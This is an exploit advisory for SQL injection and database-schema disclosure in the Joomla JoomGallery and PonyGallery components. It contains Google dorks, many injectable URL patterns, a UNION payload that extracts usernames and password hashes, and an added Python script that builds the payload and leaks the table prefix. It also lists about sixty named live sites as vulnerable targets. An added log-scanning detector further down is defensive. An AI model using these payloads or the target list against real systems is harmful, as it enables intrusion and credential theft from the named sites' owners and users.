- ####################################################################
- # Exploit Title : Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 12/02/2019
- # Vendor Homepage : joomlander.net - joomlacode.org
- # Software Download Link : github.com/JoomGallery/JoomGallery/archive/master.zip
- adyawinsa.com/index.php/remository?func=fileinfo&id=2
- github.com/JoomGallery/JoomGallery
- # Software Information Link : en.joomgallery.net/faq/general-faq/migration-and-update-to-joomgallery-15.html
- en.joomgallery.net/demo/faq/general-faq/from-ponygallery-ml-in-joomla-1-5-89.html
- extensions.joomla.org/extension/photos-a-images/galleries/joomgallery/
- sourceforge.net/projects/pony-gallery/
- joomlacode.org/gf/project/ponygalleryrand/
- # Software Affected Versions : JoomGallery 3.3.0 and 3.2.2 for Joomla 3.x, and previous versions
- + PonyGallery 2.5.1 ML for Joomla 1.5 - PonyGallery v1.0.x extension
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:"/index.php?option=com_ponygallery"
- inurl:"/index.php?option=com_joomgallery"
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # Old Similar CVE [ Only Version and Parameters are different ] : CVE-2007-4046
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- JoomGallery is a gallery component fully integrated into Joomla!, with support for Joomla! 3.x.
- PonyGallery is a module that displays one or more random PonyGallery images, as sizable thumbnails or
- full-size, in horizontal or vertical orientation, with optional category and author links.
- This Joomla extension/component moved to JoomlaCode.org on 12/12/2007 from Joomlander.Net.
- JoomGallery and PonyGallery are now presented together.
- ####################################################################
- # Impact :
- ***********
- * Joomla JoomGallery 3.2.2, PonyGallery 2.5.1 and other versions of these components for Joomla are
- prone to SQL injection: request parameters such as Itemid, catid, id, startpage, page and date are
- used in SQL queries without sufficient sanitisation.
- A remote, unauthenticated attacker can send a crafted request from an ordinary browser and execute
- arbitrary SQL statements in the application's database: read or modify data (including the users
- table, as the example payload below shows), or reach latent vulnerabilities in the underlying
- database server.
- * The component also exposes its bundled SQL scripts to any remote user (information exposure).
- The paths listed under "Database Disclosure Exploit" are JoomGallery's installation, uninstallation
- and update schema scripts, not a dump of the live database: they disclose table and column names,
- which is useful for tuning the injection payload, but hold no stored records. Credentials (Joomla
- stores password hashes, not plaintext) are obtained through the injection itself. Direct download of
- *.sql files under administrator/components/ should be denied at the web server.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_ponygallery&Itemid=[SQL Injection]
- /index.php?option=com_ponygallery&Itemid=[SQL Injection]&func=special
- /index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL Injection]
- /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=detail&id=[SQL Injection]
- /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[SQL Injection]&lang=dutch
- /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[ID-NUMBER]&startpage=[SQL Injection]
- /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=special&sorting=lastcomment&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
- /index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&Itemid=[SQL Injection]&lang=en
- /index.php?option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?view=detail&id=[SQL Injection]&option=com_joomgallery
- /index.php?format=feed&type=rss&option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?view=image&format=raw&type=orig&id=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?view=image&format=raw&type=img&id=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?view=detail&id=[ID-NUMBER]&option=com_joomgallery&lang=en&Itemid=[SQL Injection]
- /index.php?view=category&catid=[ID-NUMBER]&option=com_joomgallery&Itemid=[ID-NUMBER]&page=[SQL Injection]
- /index.php?option=com_joomgallery&func=download&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]&lang=ru
- /index.php?option=com_joomgallery&catid=[ID-NUMBER]&lang=de&view=category&Itemid=[SQL Injection]&format=feed&type=atom
- /index.php?view=category&catid=[ID-NUMBER]&page=[ID-NUMBER]&catpage=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?view=category&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&Itemid=[SQL Injection]&lang=en#subcategory
- # Example SQL Injection Exploit Payload :
- *************************************
- %20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*
- (The char() calls decode to "username:" and " password:", so the payload needs no quote characters.
- The seven columns must match the column count of the injected SELECT, and jos_ is only the default
- Joomla 1.5 table prefix; the verbose error shown further down reveals the target's real prefix.)
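- The following is an added example, not part of this advisory and not JoomGallery or PonyGallery code. It rebuilds the payload above from its parts (char()-encoded labels, one filler per column of the original SELECT, the UNION and comment terminator) and parses the verbose MySQL error quoted in the "Example SQL Database Error" section, so that the leaked table prefix can replace jos_ on targets that use a non-default prefix (Joomla 3.x generates a random one at install time). The sample error body is constructed from the text quoted on this page; the URL pattern and filler values are the page's own; the regular expressions are this example's assumptions about Joomla's error output format.

```python
"""Added example (not from the advisory): rebuilds the UNION payload shown above
and fingerprints the verbose MySQL error the component returns."""
import re
from urllib.parse import quote

PLACEHOLDER = "[SQL Injection]"


def mysql_char(text: str) -> str:
    """Encode text as a MySQL char(...) call so the payload carries no quote
    characters (the page's payload does this for the 'username:' labels)."""
    return "char(" + ",".join(str(ord(ch)) for ch in text) + ")"


def union_payload(fillers, table, columns=("username", "password"),
                  labels=("username:", " password:")):
    """Build ' union select ... from <table>/*'.

    fillers has one entry per column of the original SELECT (the count must
    match, otherwise MySQL rejects the UNION); the single None entry marks the
    column whose value is rendered in the page and receives the concat().
    """
    if list(fillers).count(None) != 1:
        raise ValueError("exactly one None filler marks the output column")
    pieces = []
    for column, label in zip(columns, labels):
        pieces += [mysql_char(label), column]
    concat = "concat(" + ",".join(pieces) + ")"
    cols = [concat if f is None else str(f) for f in fillers]
    return " union select " + ",".join(cols) + " from " + table + "/*"


def inject(template: str, payload: str) -> str:
    """Substitute the placeholder in one of the URL patterns above, percent-
    encoding the payload the way the page's example does (spaces -> %20)."""
    return template.replace(PLACEHOLDER, quote(payload, safe="/,()*:"))


# Assumed shape of the verbose error echoed by Joomla's database layer:
# message, the offending fragment after "near", then the statement after "SQL=".
MYSQL_ERROR = re.compile(
    r"You have an error in your SQL syntax;.*?near '(?P<near>[^']*)'"
    r"(?: at line \d+)?\s*SQL=(?P<sql>.+)", re.S)


def fingerprint_error(body: str):
    """Extract what a verbose error leaks: the fragment MySQL choked on, the
    tables named in the query, and the Joomla table prefix (jos_ here)."""
    match = MYSQL_ERROR.search(body)
    if not match:
        return None
    sql = " ".join(match.group("sql").split())
    tables = re.findall(r"\b(?:FROM|JOIN)\s+(\w+)", sql, re.I)
    prefixes = {t.split("_", 1)[0] + "_" for t in tables if "_" in t}
    return {
        "near": match.group("near"),
        "tables": tables,
        "prefix": prefixes.pop() if len(prefixes) == 1 else None,
        "sql": sql,
    }


# Constructed sample: the error text quoted in this advisory, joined into one
# response body as a browser would receive it.
SAMPLE_BODY = (
    "No valid database connection You have an error in your SQL syntax; "
    "check the manual that corresponds to your MySQL server version for the "
    "right syntax to use near '-8,8' at line 17 SQL=SELECT *, a.owner AS owner, "
    "ROUND(imgvotesum/imgvotes, 2) AS rating FROM jos_joomgallery AS a LEFT JOIN "
    "jos_joomgallery_catg AS c ON c.cid=a.catid WHERE a.published = '1' AND "
    "a.catid = '113' AND a.approved = '1' AND c.access <= '0' ORDER BY "
    "a.imgdate ASC, a.imgdate ASC, a.imgdate ASC LIMIT -8,8"
)

if __name__ == "__main__":
    leak = fingerprint_error(SAMPLE_BODY)
    # The leaked prefix replaces the default jos_; seven fillers is the column
    # count the page's payload assumes and must be confirmed per target.
    payload = union_payload([1, 2, 3, None, 5, 0, 0], leak["prefix"] + "users")
    print(inject("/index.php?option=com_joomgallery&Itemid=" + PLACEHOLDER, payload))
```

- The column count is established per target before the UNION is sent (for instance with increasing ORDER BY n probes until MySQL errors), and the trailing /* only neutralises SQL that follows the injection point; where nothing follows, a "-- " or # terminator is the usual substitute.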
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_joomgallery/sql/install.mysql.utf8.sql
- /administrator/components/com_joomgallery/sql/uninstall.mysql.utf8.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/2.0.0.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/2.1.0.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/3.0.0.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/3.1.0.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/3.2.0.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/3.2.1.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/3.3.0.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] skhssco.org.mo/index.php?option=com_joomgallery&func=viewcategory&catid=113&startpage=1&substartpage=3&Itemid=5%27&lang=en
- [+] okokratt.ee/gamezone/index.php?option=com_joomgallery&func=viewcategory&catid=7&startpage=1&substartpage=1&Itemid=44%27&lang=en
- [+] cimbria.net/joomla/index.php?option=com_ponygallery&Itemid=38%27
- [+] kirchen-wiesbaden.de/kiwicms/index.php?option=com_ponygallery&Itemid=58&func=special&sorting=lastcomment&date=2018-11-01%27
- [+] 2007-2013.przedszkole-szarytki.pl/index.php?option=com_ponygallery&Itemid=2&func=viewcategory&catid=294%27
- [+] gimnazjum2013.gimnazjumrobakowo.ehost.pl/index.php?option=com_ponygallery&Itemid=40&func=detail&id=2842%27
- [+] cobur.nl/vp/nl/index.php?option=com_ponygallery&Itemid=77&func=detail&id=1457%27
- [+] fcppublicidade.com.br/fcppublicidadev02/index.php?option=com_ponygallery&func=detail&id=508%27
- [+] ijzervlechtbedrijfserdalbv.nl/nl/index.php?option=com_ponygallery&Itemid=34&func=viewcategory&catid=12%27&lang=dutch
- [+] przedszkole-elf.com/index.php?option=com_ponygallery&Itemid=11&func=detail&id=355%27
- [+] ijzervlechtbedrijfserdalbv.nl/nl/index.php?option=com_ponygallery&Itemid=34&func=viewcategory&catid=13%27
- [+] webo-airbrush.de/index.php?option=com_ponygallery&Itemid=26&func=viewcategory&catid=2%27
- [+] jettspandoeken.nl/nl/index.php?option=com_ponygallery&Itemid=34%27
- [+] spkowala.pl/index.php?option=com_ponygallery&Itemid=61%27&func=special
- [+] vanessa-tholen.de/index.php?option=com_ponygallery&Itemid=30&func=viewcategory&catid=1%27
- [+] dyadent.com.ec/index.php?option=com_ponygallery&Itemid=9&func=viewcategory&catid=7%27
- [+] ebea.at/bernd/cms/index.php?option=com_ponygallery&Itemid=4%27
- [+] planetacanino.com/index.php?option=com_ponygallery&Itemid=43%27
- [+] melly-web.de/content/index.php?option=com_ponygallery&Itemid=1%27
- [+] sanpedrolloc.awardspace.biz/index.php?option=com_ponygallery&Itemid=35%27
- [+] dsi.cba.pl/index.php?option=com_ponygallery&Itemid=26&func=detail&id=6132%27
- [+] hamazoor.ir/persian/index.php?option=com_ponygallery&Itemid=29&func=viewcategory&catid=123&startpage=1
- [+] braeuwiese.at/index.php?option=com_joomgallery&func=viewcategory&catid=2&Itemid=27%27
- [+] w-caspari.at/index.php/index.php?view=image&format=raw&type=orig&id=116&option=com_joomgallery&Itemid=69%27
- [+] mitennis.com/old/index.php?format=feed&type=rss&option=com_joomgallery&Itemid=82%27
- [+] tsg.myeasysolution.com/index.php?view=image&format=raw&type=orig&id=6&option=com_joomgallery&Itemid=52%27
- [+] bianchicaterina.it/public/index.php?view=category&catid=7&option=com_joomgallery&Itemid=112%27
- [+] parafiaotmuchow.pl/index.php?view=detail&id=227&option=com_joomgallery&Itemid=135%27
- [+] elivaniacosta.com.br/new/index.php?option=com_joomgallery&view=gallery&Itemid=74%27
- [+] templenoegaa.ie/index.php?view=category&catid=46&option=com_joomgallery&Itemid=53%27
- [+] swalestudio.com/anime/index.php?option=com_joomgallery&func=detail&id=1808&Itemid=2%27
- [+] bogorgreenforest.com/index.php?view=category&catid=4&option=com_joomgallery&Itemid=62%27
- [+] capitalbank.co.zw/index.php?view=category&catid=1&startpage=3&substartpage=1&option=com_joomgallery&Itemid=144%27
- [+] pinsk.pl/index.php?view=detail&id=52&option=com_joomgallery&Itemid=8%27
- [+] pazyna.pl/index.php?view=detail&id=171%27&option=com_joomgallery
- [+] arhiva.gcjelenac.com/index.php?option=com_joomgallery&Itemid=103&func=viewcategory&catid=4%27
- [+] comunidadconocimiento.com/versionanterior/index.php?option=com_joomgallery&func=detail&id=124&Itemid=58%27
- [+] gimnazjum51.poznan.pl/index.php?option=com_joomgallery&func=detail&id=11685&Itemid=8%27
- [+] artegrazia.it/arte/index.php?option=com_joomgallery&func=detail&id=123&Itemid=57%27
- [+] capitalbank.co.zw/index.php?view=image&format=raw&type=orig&id=15&option=com_joomgallery&Itemid=144%27
- [+] stefvangorp.be/pages/index.php?view=image&format=raw&type=orig&id=16&option=com_joomgallery&Itemid=110%27
- [+] qapsites.com.br/coophalis/index.php?view=category&catid=2&startpage=3&substartpage=1&option=com_joomgallery&Itemid=53%27
- [+] sedeelectronica.yunqueradehenares.com/index.php?option=com_joomgallery&Itemid=72%27
- [+] elivaniacosta.com.br/new/index.php?view=image&format=raw&type=img&id=166&option=com_joomgallery&Itemid=74%27
- [+] jennersdorf.gernots.at/index.php?view=category&catid=84&page=13&catpage=1&option=com_joomgallery&Itemid=811%27
- [+] petersmusikstudio.se/index.php?view=image&format=raw&type=orig&id=35&option=com_joomgallery&Itemid=57%27
- [+] lacel.cnt.br/site_/administrator/index.php?option=com_joomgallery&act=1%27=categories
- [+] zssvinov.cz/index.php?view=category&catid=69&option=com_joomgallery&Itemid=626%27
- [+] vs.eggersdorf.at/index.php?view=category&catid=1&option=com_joomgallery&Itemid=31%27
- [+] znkpomurje.com/old_joomla/index.php?view=category&catid=21&option=com_joomgallery&Itemid=63%27
- [+] kalcherhof.com/index.php?option=com_joomgallery&catid=6&lang=de&view=category&Itemid=201%27&format=feed&type=atom
- [+] apartmani-rakovic.com/index.php?view=category&catid=5&option=com_joomgallery&Itemid=69%27
- [+] tr.institutbuhara.com/index.php?option=com_joomgallery&Itemid=75%27
- [+] broprof.ru/burjated/index.php?option=com_joomgallery&func=download&catid=37&id=1601&Itemid=55%27&lang=ru
- [+] omaspumpkinpatch.com/index.php?option=com_joomgallery&func=detail&id=27&Itemid=67%27
- [+] rennrodeln-blankenburg.de/index.php?view=category&catid=5&option=com_joomgallery&Itemid=24%27
- [+] musikschule-gnas.at/cms2/index.php?view=category&catid=52&option=com_joomgallery&Itemid=510%27
- [+] hydrobiology-bg.com/index.php?view=detail&id=44&option=com_joomgallery&lang=en&Itemid=1%27
- [+] uralvelo.ru/index.php?view=category&catid=14&option=com_joomgallery&Itemid=91%27
- [+] rsc-gross-umstadt.de/index.php?view=category&catid=2&page=3&catpage=1&option=com_joomgallery&Itemid=61%27
- [+] skastudents.com/index.php?view=detail&id=88&option=com_joomgallery&Itemid=84%27
- [+] gartenfreunde-bondorf-gaeu.de/index.php?view=category&catid=2&option=com_joomgallery&Itemid=184&page=1%27
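- For the defending side, the following added example (not from the advisory, and not code of either component) turns the request shapes listed above into a log check: every request for com_joomgallery or com_ponygallery whose identifier parameters (Itemid, catid, id, startpage, substartpage, page, catpage) are not plain integers, or whose date parameter is not YYYY-MM-DD, is reported with the offending value. The parameter list is assumed from the URL patterns in this advisory rather than from the components' source, and the log lines are constructed for the example in Apache combined format, mirroring the probes above (the %27 single quote and the UNION payload).

```python
"""Added example (not from the advisory): flags requests shaped like the probes
above in a web-server access log (Apache/nginx combined format assumed)."""
import re
from urllib.parse import urlsplit, parse_qsl

# Components named in the advisory and the request parameters its URL
# patterns inject into (assumed from the patterns, not from the source).
COMPONENTS = {"com_joomgallery", "com_ponygallery"}
INT_PARAMS = {"Itemid", "catid", "id", "startpage", "substartpage", "page", "catpage"}
DATE_PARAMS = {"date"}

INT_RE = re.compile(r"^\d+$")
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")
# Combined log format: client ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def suspicious_params(path: str):
    """Return [(param, decoded value, reason)] for one request path, or [] when
    the request is not for a listed component or every value looks benign."""
    parts = urlsplit(path)
    # parse_qsl percent-decodes, so Itemid=5%27 arrives here as "5'".
    params = parse_qsl(parts.query, keep_blank_values=True)
    if dict(params).get("option") not in COMPONENTS:
        return []
    findings = []
    for name, value in params:
        if name in INT_PARAMS and not INT_RE.match(value):
            findings.append((name, value, "non-integer identifier"))
        elif name in DATE_PARAMS and not DATE_RE.match(value):
            findings.append((name, value, "malformed date"))
    return findings


def scan_log(lines):
    """Yield one finding per flagged request; unparsable lines are skipped."""
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        hits = suspicious_params(match.group("path"))
        if hits:
            yield {
                "ip": match.group("ip"),
                "time": match.group("time"),
                "status": int(match.group("status")),
                "path": match.group("path"),
                "hits": hits,
            }


# Constructed sample log: three probes of the kinds listed in the advisory,
# one clean gallery request and one request for an unrelated component.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Feb/2019:10:01:02 +0000] "GET /index.php?option=com_joomgallery'
    '&func=viewcategory&catid=113&startpage=1&substartpage=3&Itemid=5%27&lang=en HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Feb/2019:10:01:09 +0000] "GET /index.php?option=com_ponygallery'
    '&Itemid=58&func=special&sorting=lastcomment&date=2018-11-01%27 HTTP/1.1" '
    '200 4870 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Feb/2019:10:01:15 +0000] "GET /index.php?option=com_joomgallery'
    '&Itemid=27%20union%20select%201,2,3,4,5,0,0%20from%20jos_users/* HTTP/1.1" '
    '200 9001 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Feb/2019:10:02:00 +0000] "GET /index.php?option=com_joomgallery'
    '&view=category&catid=7&Itemid=112 HTTP/1.1" 200 3100 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Feb/2019:10:02:03 +0000] "GET /index.php?option=com_content'
    '&view=article&id=12%27 HTTP/1.1" 200 2200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        for name, value, reason in finding["hits"]:
            print(f'{finding["time"]} {finding["ip"]} {reason}: {name}={value!r}')
```

- A 200 status on a flagged request says nothing on its own: the vulnerable builds return the MySQL error inside a normal page, so the response size and body, not the status code, distinguish a failed probe from a successful UNION.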
- ####################################################################
- # Example SQL Database Error :
- ****************************
- (Verbose PHP notices and MySQL errors are returned to the client. The failed query discloses the
- table prefix jos_, the table and column names, and that the pagination value reaches the LIMIT
- clause unvalidated, here as a negative offset.)
- Deprecated: Assigning the return value of new by reference is
- deprecated in /home/users/puhelf/public_html/includes/joomla.php on line 829
- Deprecated: Non-static method JSite::getMenu() should not be called statically,
- assuming $this from incompatible context in /home/doggymon/public_html
- /NJBalloon.com/components/com_joomgallery/views/detail/view.html.php on line 60
- No valid database connection You have an error in your SQL syntax;
- check the manual that corresponds to your MySQL server version for the
- right syntax to use near '-8,8' at line 17
- SQL=SELECT *, a.owner AS owner, ROUND(imgvotesum/imgvotes, 2) AS rating
-     FROM jos_joomgallery AS a LEFT JOIN jos_joomgallery_catg AS c ON c.cid=a.catid
-     WHERE a.published = '1' AND a.catid = '113' AND a.approved = '1' AND c.access <= '0'
-     ORDER BY a.imgdate ASC, a.imgdate ASC, a.imgdate ASC LIMIT -8,8
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################